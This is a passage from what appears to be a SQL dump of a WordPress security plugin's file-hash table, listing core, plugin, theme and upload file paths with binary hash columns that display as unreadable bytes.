dist/metabox-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�X�e�uE,c�[','�;�)�Y����֭RW<��\'�tˊ0W`','',0,'?'),('\Z\Z��L�X�?T鍦','wp-content/themes/twentytwentyone/assets/images/young-woman-in-mauve.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̦\\����l��G?','�;�}pSy���,7sa.�T��ˌO1q\'�5[��~','',0,'?'),('\Z���w�,� -,:�&P','wp-content/plugins/wordpress-seo/admin/views/tabs/social/pinterest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^\Z�q_��,u�� h','H;4qʜ\'Y�C�\Z:��V�C�p�\Z-�{R�','',0,'?'),('\Z�����L6N�1�;8�','wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"���w^\n���k�6','�!�5�@�a�6t�o�5(D�s���\n��K�f','',0,'?'),('\Z�;5�(��O�O�R�','wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ǜ����lm�D!','�\'�9�\r9�\0o|��\Z������|����0K','',0,'?'),('\Z�lW8��u�,��2h�','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/taxonomy-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����oI��G�9>\0��','~:Bf5>O���e?���|\0Қ�wM��oRn�wS','',0,'?'),('\ZŴԭ�xvw�E\nv','wp-content/plugins/wp-cerber/assets/flags/mk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x���Zx��e��','Ŷv�ew��s��֝�wx�YԌ[@eQ�C�j','',0,'?'),('\Z����)qtsCI9','wp-includes/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d&@h���v��4�$%','��䛭�p���)�bDc�5��f���ɷ��P,�','',0,'?'),('\Z�y��8R#O�y��','wp-admin/css/nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s���U�v3չ��','U�F�?�Y��dH8ra�%����4���w�','',0,'?'),('\Z��\Z:\\��Rf�P�~3','wp-includes/class-wp-metadata-lazyloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I^�P���;$�+\"�','^2��)E>X���4�:��U&�߳;���!e','',0,'?'),('\Z�UE�s(��#E�p','wp-includes/images/smilies/icon_mrgreen.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$_��u�X|I%~$','!B���I1�mV�-���|ј�X5D�8���h�','',0,'?'),('\Z���/�̓��T%�g4','wp-includes/js/jquery/ui/effect-drop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���閴�u)�B���1�','��v��h��d���L�V�y�^n\"�ّ\0]p�','',0,'?'),('p9}dZBw�NN�7`m','wp-content/plugins/wordpress-seo/admin/class-meta-columns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_!��e\n������X','�p��~@L`�hP��d�gE���Y���zm','',0,'?'),('$�P�`��\0g�X�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yF\\����2���','2k�s��\\>��RI:nH�ȿDm�!zz���','',0,'?'),('\'^ �} -R�Ȗ4�','wp-content/plugins/wp-cerber/languages/wp-cerber-de_CH.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�kmf--�=��? ox','���v�Ĭ�ኾ+]^�CR.ؠ�$b�Cf�','',0,'?'),('-��c�<���@�VsZ�','wp-includes/js/api-request.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����߿G7p6{�g','�d�6Q\\����f�:�����G`��j1V�','',0,'?'),('?����?���y\0l','wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-activation-error-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�<|����,)D��i','�#�{�� s���o�U�䵣dA�v����ϚU','',0,'?'),('P$~��k�\n�T/','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-ca.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B���6ãq��)�DS�','4Ӑ6Z�����&�Q@.�Z+i$�\nȁM�G�Ϳ','',0,'?'),('Ryr�|���o>���>','wp-content/themes/twentytwentyone/assets/css/style-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!<���5�o�wb��','�5���;~�\'e��nٵw0֓�Q��5\'�P�','',0,'?'),('U 5cH9\Ze�����','wp-content/uploads/2016/11/home-updraft-pre-smush-original.jpg',0,'<V��6ۧ�o�$�8�B','<V��6ۧ�o�$�8�B','��̱Y%�J\"�xJ�I�N�}:���B\n4I�f','',0,'?'),('^����}\\� �Q�','wp-content/plugins/wordpress-seo/src/presenters/open-graph/description-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8dA���d�/���','0s�b�w��^�`�&\0�R��h6\0o �G�+e','',0,'?'),('_��z���9�݀D:��','wp-includes/blocks/media-text/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/��~��b�7��','�m��9�\Z�KF��r�R��\r�O�,yE�','',0,'?'),('�Lo��˃�Zh�{�','wp-content/plugins/wordpress-seo/src/helpers/meta-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ы��|%܈G�?��','��$y�Sdlg�&�\r�uƂf��(@�t�m�A\0','',0,'?'),('�y���!�\0pZ�[A','wp-includes/js/mediaelement/mediaelement-and-player.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�iz+*;)��E�','�-5(��:�oQ[̪���\\�\nm~�CP','',0,'?'),('��E�ȖqȊ?2�H�','wp-includes/js/dist/api-fetch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����n�m�h��{�P�','�(�Ԅ\"�@>ajw@w�74U�C0�D�6/��|�','',0,'?'),('�5pު�m�\Z��','wp-includes/blocks/separator/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|�D��JoA���','\"w� ��u���{[�H�6W�ο��','',0,'?'),('��<b���!�','wp-content/plugins/wp-cerber/assets/flags/ge.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Aw�J#ܿ�d��F','��6��o�M�X��ݕ�D���֖M�+','',0,'?'),('���<���|Q���','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-metabox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ZM��C�5O��i�>','p?S�K@�Se������۷���$���ѯ','',0,'?'),('�#U���d��,1�','wp-content/plugins/wordpress-seo/src/integrations/front-end/backwards-compatibility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�ܳg\n�i]��R�','&AHo�ns��?̢\\}F�x7g[^����k��Ɉ','',0,'?'),('ֻE\n�<�B�[�,','wp-includes/class-wp-ajax-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o6�)�Q�\"Sσt�.H�','��[��$���g�nM!^\\���9t�t��>Z�','',0,'?'),('�����\n���V7 ','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/AppendStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Y+i��q�E��1�','�N�\r,�~0���!�G�����=^�[�#��7','',0,'?'),('N L�6�����','wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}�\"���7ڷ��DZ','�.I�H\Z�g\0�H!7`��gޠZ�zȄ�ž6|','',0,'?'),('�lV!�,~(��c�','wp-content/uploads/2019/08/Therapy-300x250.jpg',0,'���3J���$N','���3J���$N','ԣ�i�\\���c�?�8�����yN��>��V�6','',0,'?'),('�m��n9�F�6�','wp-admin/css/admin-menu-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8d(O��VYE�Ä','G��՜�.��t���zYg�^��q����,��','',0,'?'),('�WY��jC_ܓ(��','wp-content/plugins/wordpress-seo/css/dist/edit-page-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J2I�(�<����','���H|�+[uI��4�02x\'4�X�b�@?�m�','',0,'?'),('x�nB\Z�mG<','wp-content/plugins/wordpress-seo/languages/wordpress-seo-sk_SK.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�Zr��%���V�f','�xY&�|gΝX \'\'�hE��̢\n,�����','',0,'?'),(')�M��^�ûoz�','wp-admin/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�ל�x>c������¢','�<\0Ѕҩ��هqU%��G��7r�\\�*��2J','',0,'?'),('4%�IH�O��ʰ�L','wp-includes/css/media-views.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3\\Н�l�\r�!�5\0','\n����}H8#4���0��۲\nCQ�f+�9��','',0,'?'),('<B��ʱ�A51ӱ','wp-content/plugins/akismet/_inc/form.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�4�l*��&��i','�MB�1�QwoX4bx��c)@D�˥��k','',0,'?'),('C�/�;)��ّ�o','wp-admin/js/comment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �\'v�\\�t\'�ӵ�','ku0��\\�V�{0�wZN%Y-�)������^`','',0,'?'),('H-�F!|�J�+)u','wp-includes/blocks/post-content/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+c;N��/�ݠv�.','��\Z�$��#�k\\=�����Z��G�v��܌o','',0,'?'),('H��~�\n��x����|','wp-includes/js/dist/token-list.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-�\\�^�kL','�ZZcа��9)Ej&;|����&�[I����','',0,'?'),('Lf�:���)��\n���','wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-wp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Eٱ��uR����ܱ�]','���7�+y�6Ʉ/-�Ԗ0X.{���^�٨jh','',0,'?'),('S��v��]��$ů�','wp-content/plugins/wordpress-seo/src/presentations/indexable-home-page-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���rZ�bظ m','D!��yWu�\nq\Z�����\ZK��܉H�*���D�','',0,'?'),('T�gslF��ʞ�Ly','wp-admin/js/set-post-thumbnail.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�P�N�H�9e�@I','e}#����n�q�J�rJ��Q<d��Z�K�4','',0,'?'),('Y ����S��z�X^','wp-content/plugins/wp-cerber/assets/flags/bj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��̂(,�ߨP}r��','�` �U�Y�ģ���Ç�/�5��T��\"5','',0,'?'),('a�@�WrQw��Z\n.�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܑz�g<N��\n?o6f','���R����Eg�X3��JAc��!a�_��S{','',0,'?'),('h|��x鄒GLK1$','wp-content/plugins/wordpress-seo/src/presenters/bingbot-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n`6�\Zr�}���tU','�خ��vq͠��P�X[���+U�=���=�]��g','',0,'?'),('z�|*6�S\\5��3','wp-content/plugins/wordfence/lib/wordfenceScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I��J &�����','�9ʲt�������m�����?z5\\�0nl','',0,'?'),('�\n$z�X�`�1Bw','wp-includes/js/tinymce/plugins/charmap/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��5^����','[�B�\Z,;��j�fe�MU�j|)�rv��>U�F','',0,'?'),('��=b�6��hs���t','wp-admin/ms-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:1R] l�I��!#_J','7�E��H����Pu�����Z�b��G','',0,'?'),('��\'��FE�A�vQMv','wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\r��5]xVI�\'�i�','��G��݅\'�!���Y�E�3��P5ad��M��','',0,'?'),('��I�����UzYWg!g','wp-includes/blocks/latest-comments/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ؿ�d6x�T�','�g^��%�je�wo��e�UQu�֨��/�','',0,'?'),('�����>����p�\rB','wp-content/themes/twentytwentyone/assets/sass/06-components/pagination.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d�N#vk�s��z','w;�[f�]X��Þ&�����y2,����F','',0,'?'),('�^�u[�p}`B��W1','wp-includes/blocks/table/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uQ��[�F,�Z�ݜ�','Ű�Z�鶤�\'.�iT��*�\\�OBjYf^�k:�','',0,'?'),('�=�px8�Qy1]w�','wp-content/plugins/wordpress-seo/inc/health-check-postname-permalink.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�k�ԍx2�Ɇ��','>�����,��H��+�7�\"繍p��4�q','',0,'?'),('ƍp�=Z\0�S_���$','wp-includes/blocks/cover/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q9�O\Z;`��B���','�hk}�K��<�g8�D=~���E��K�0��','',0,'?'),('��º��\06�R&q','wp-content/plugins/wp-cerber/assets/flags/lc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?x2\Zˁ%��*�','��dV��d����5�w$�E�,Ư�{l','',0,'?'),('�k0B��a��`�','wp-includes/customize/class-wp-customize-nav-menu-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�#Y�bu3�����','�Ӻ�f����\r���o!�cY �o��\r����','',0,'?'),('����^�cm]�s~','wp-content/plugins/wp-cerber/nexus/cerber-nexus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�;/�]Г��s�M�','R\"��l�8w�&l�3Z����O���ֳwk��','',0,'?'),('�\r)�51T�� ��o','wp-content/themes/twentytwentyone/inc/block-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t@/�ߢ�@e��R','��r�4����w�����zZ�Z�S$�','',0,'?'),('ܟ�ҿB∶����','wp-includes/js/dist/media-utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5 �������I�Wc�','���~�w�(�=Iu*��\\��O�\r������','',0,'?'),('�-=Q�Cw�tnL�#','wp-content/plugins/wordfence/lib/wfBrowscap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r�e.�����b��','�Hz�n���O�#�/�t�ɚ\"���U ���A�i�','',0,'?'),('\n��O�_��;]/^��','wp-includes/images/down_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V�~�o�YnG~_u','��h�8ɧ���p�u�{�9������J���','',0,'?'),('ν�}�V�+�tB�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��꤀�x�٠�%�cl','N�8,�c����ae����Οi<5p$���','',0,'?'),('G_bc�.,]&���','wp-admin/js/image-edit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\'�L�\n�r�)�L','o9J�B�{2[�Je\r����@q��ؘ�Դ�lD�','',0,'?'),('Kv�$T�MR����=�','wp-includes/css/dist/edit-post/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A˨mʟ����OJ(','h֘���۰�ߕ��-@_�h���\n�����]�f�','',0,'?'),('(!���~���\"�','wp-content/plugins/wordpress-seo/js/dist/languages/pt-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YU}�� ��?:@�ة','%�}!f��EH�2/t�抆#���,�[˛@Fw�','',0,'?'),('2J0���xYr���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�Q[릶������','�)�t1��@�1\0��ו����KW���\0���','',0,'?'),('3�*�;i�2^����','wp-content/plugins/wordpress-seo/admin/views/tabs/social/twitterbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�u_��8�ky�Bj','9}�x�t�ӂ���M��OD���8�W���,�m~P�','',0,'?'),('L/��xn9�� �|�m','wp-content/themes/vega/assets/css/font-awesome.5.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��j���o���y0','ţ��^\r[0���/37b�O�]\"�梄-hv!i','',0,'?'),('O�ں�^�8�Kq���','wp-content/plugins/wordpress-seo/src/helpers/schema/language-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��S�t���I��H�',' �+���r?��V�Ns{����!�y���a�','',0,'?'),('[Wr\'��E��)�j�','wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-indexing-complete-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����+�_Wf\n�\"c[','�go4E�qD�T<7��>���� ��i�/Q#','',0,'?'),(']���(�7�^����U','wp-content/plugins/wp-cerber/assets/flags/zw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�^�~����E,Tl','S��Y�2�r�5��S�a�J�\"��tJ�@ArC�','',0,'?'),('fMx��� �+9�U�','wp-admin/js/customize-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��u�r���SN,�A','e�����PK�r�Vz��979�����n\0��','',0,'?'),('}:\\��.?B��B','wp-includes/blocks/post-content/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0Np�E�� ;�J{��','��B�@\\H�N8�P��ߣ�D��.���','',0,'?'),('}�/N�r%�]t��','wp-content/plugins/wordpress-seo/src/integrations/watchers/primary-term-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/~R�Ɨa���8gs,�','��|���!C��$dĿL\0ew��cX����','',0,'?'),('�ݨ�������K(��1','wp-content/plugins/wordpress-seo/css/dist/yoast-extensions-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�dXר�0�(��H','�������.�!�w�u���#S�ׂʘ�-���L','',0,'?'),('�%��\\��MA����','wp-admin/images/wordpress-logo-white.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��qP�C��-SPD�','e�4�E��?�&�DsA���ʬ�;�)@�Xɒ','',0,'?'),('����J�}F��E\0�9�','wp-content/themes/index.php',0,'gD,V�=\\�bP','gD,V�=\\�bP','k�����~ ��UH\Z��x�P��Ā��<��;X�','',0,'?'),('���B��Q]-','wp-content/uploads/2016/11/interior-design-150x90.jpg',0,'��dk��/��q�x�','��dk��/��q�x�','����Q~3�I�є�V�e��;\'y�:�H','',0,'?'),('��P�6��$�Mf��j','wp-content/languages/admin-network-en_GB.mo',0,'���預��-i7H &d','���預��-i7H &d','�h���� ^�~�M�U����$�:&�\n��','',0,'?'),('�\0_P�P��Cx�14\0','wp-content/plugins/wordpress-seo/src/config/schema-types.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D,�?j����(NP1e','�
R�k��!���@�Ky=te�{q5��d�','',0,'?'),('�=�}C���i��HT','wp-admin/network/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�3���@%�c ','�\\H�.7���7QtUw�ݰAK,�$A��!��Lz','',0,'?'),('��g+������,c�','wp-includes/block-supports/colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<+SU1+��f2e','F�ν����0lބ�\r��^,����iOk�8','',0,'?'),('̖�PRݒo�.̇�','wp-content/plugins/wordpress-seo/src/schema-templates/recipe-ingredients.block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',1�|�\0%;�\r5LK��x','�Eq�wy�\Z7��3�,N���X\0��c�\Zm�ڙ','',0,'?'),('�g��I�!٭���_�','wp-includes/ms-blogs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YYw_s簃@ DE�m','�~ۃG��,,?��0��v��f��UӧN��iK','',0,'?'),('���t�DX�m\0#�(�','wp-includes/customize/class-wp-customize-nav-menu-locations-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D��]σ��2+fX','Ѵg�h��m�s�ꄑ��-vmQ�Ij�\Z]sQT9�m','',0,'?'),('��]/~���q��XŎE','wp-includes/js/jquery/ui/button.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k{�qz�uo�>���','8�v�J.�OA�z��A)�HJe�f�B�,��z','',0,'?'),('���L?\n�\n���x��@','wp-content/plugins/wp-cerber/assets/flags/al.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#����S�{r<�','����G�U0<>�.]fX�[I���\0����7','',0,'?'),('����\Z~!�N����','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;��.��L��K�','+#O�*��Z.q#�:ϝ,����������q��','',0,'?'),(';^3<��� r�&�r','wp-content/plugins/redirection/matches/from-notfrom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ư��i�Ά�n��xc','��ܑI��o�\r|��A:�9��L�c���8','',0,'?'),('B�@�R*G�xF4N}','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�_�?Sş\Z]�y�','�6��[-�,9YR�r�\rY\"-��an�6$�','',0,'?'),('R�\\�&��T �|`','wp-includes/class-wp-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_��J�b��X�t@C�','~�/�X����`����-�?��ڱ�a�X�|','',0,'?'),('^��A3,������x','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-company-logo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?1ā����p9+�tP','��L�F��ѿ�\r�v��<O<��v��;yU�r�','',0,'?'),('tt̸�T�.�*óU�','wp-content/plugins/wordfence/modules/login-security/views/page/role.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!|3�is:���y�',']F��ŀ�T��ݵ�*�b`u��n��9��\'(�','',0,'?'),('ynm�;�/�UsK ��','wp-includes/css/wp-embed-template-ie.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7{WP�L�{H���I�','\\aWq1��+��Я�o�L�Y\0�K���%<','',0,'?'),('z���D�>��A�)�a','wp-content/plugins/wordpress-seo/inc/wpseo-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ν��Q\\Td)����ϖ','����Ko\\Q�� *0b�$���\rS��A','',0,'?'),('|�&;�r�Ls5��','wp-admin/includes/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�U��2����','y�Ԫ�٪>tPn�ΞX�!\'�˕?��A��E','',0,'?'),('���Ye�.�0s��','wp-admin/includes/class-wp-comments-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1@K2��k5՜�~@��','�5�J�w��A���@�7��]���\\I\n��Hъ','',0,'?'),('��,d$\\Zޟ^Wu�','wp-includes/blocks/buttons/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F���jJZ ^�Q','7\'�$�����6�\'�z�i#ɖZ��O�8','',0,'?'),('�A�o\r�ZԔ_�t','wp-content/plugins/wordfence/views/waf/waf-uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8��9a�','�svZ�����kr\r��܈D:auu����','',0,'?'),('��g*(��Ӭ,Fh˧�','wp-content/uploads/2019/09/tree-surgeon-350x220.jpg',0,'%/]}>7K���7�','%/]}>7K���7�','��j[3�M��\r�k�P�<k��н�#;�+','',0,'?'),('��I/���\n �F','wp-content/plugins/wordpress-seo/src/presentations/archive-adjacent-trait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vb���;��D��d�','hfEx�\'nS�m�Ҹ�ӋƠ����1�=','',0,'?'),('��\'-�p�-��f�','wp-admin/css/l10n-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xmǏ|�s���A�',']��%FL�\nI�L��l���f426G��\'��','',0,'?'),('��j�ֹJ����0Y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�0W\"F)����8O�','�5���)&��BoK]���ػ��rm`%��h�O','',0,'?'),('�&d��-V�f��\Z_�l','wp-content/plugins/wordpress-seo/src/schema-templates/recipe-name.schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z3_�o�fq�d��','|]]����a~��O��-x�Mp(�K�\"��','',0,'?'),('�Q%rT>�!�e_zE��','wp-content/themes/twentytwentyone/inc/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��Տ,;�\"��]&�','\'�ߍ���\0�`q���ֶp�~�r�I�{��','',0,'?'),('�\"�< i�t��&�','wp-admin/css/colors/modern/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�̯��R�j�F�','24�ރ�ki<��u&�*��7�U�s��=~��F�','',0,'?'),('��)L}�\r;HF=��','wp-content/uploads/2016/11/kitchen-300x200.jpg',0,'a�qMH�����tp�Q�','a�qMH�����tp�Q�','�+\0�������%ח{�)?���2-:t�a�','',0,'?'),(' ߊ�A�\r��#\"!�','wp-content/plugins/redirection/database/schema/220.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jM�\Z�A~�s.�H�','u��~���{�.�?��!��ytK}��','',0,'?'),('9�k�ɽ �JZ��<','wp-content/themes/twentytwenty/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Y���d�����','�]��ϋS�\'��/bQ^�D�t�B�Ήi���','',0,'?'),('L����5M�SYK��','wp-content/plugins/wordpress-seo/admin/formatter/class-term-metabox-formatter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���f����*�$�<|','�ՀQd۩�qx1��@۾�͚�\0�!I((','',0,'?'),('L��bP�-I1f�','wp-includes/theme-compat/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��<w�!��1','q�2�յ��Ϣ>r�7Nj�� D�^��A5\r','',0,'?'),('N�d#R��+��r\0s[','wp-content/plugins/wordfence/views/reports/activity-report.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?ue�wD�:��E�','��ζ�\Z��)v���vG��,�h�/�ӈ�','',0,'?'),('r� �e���Z���\r','wp-content/plugins/wordpress-seo/admin/class-admin-editor-specific-replace-vars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=M��.����Z','���DU�\"P�[Y�̮l���6_n�L��','',0,'?'),('t������!�\Z�%\n','wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('�{��Y�\\�z錿�}c','wp-includes/images/smilies/rolleyes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���O�2�Ofݣi�','fK�)�\n�d��!]\r)��\\}���זl�^��','',0,'?'),('���� ��\\�A','wp-content/plugins/wordpress-seo/src/conditionals/third-party/wpml-wpseo-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)w�p�2V��\r\nfL��','�O�)r���\n-]�͂;/](�I�?U5�Ѐ�518','',0,'?'),('��WШo0�%�R!�','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-nl_BE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,��\r�W��#Q�ȡ','7�\n��*�f�=�\ZyS�p7w9�eL%����','',0,'?'),('���-� 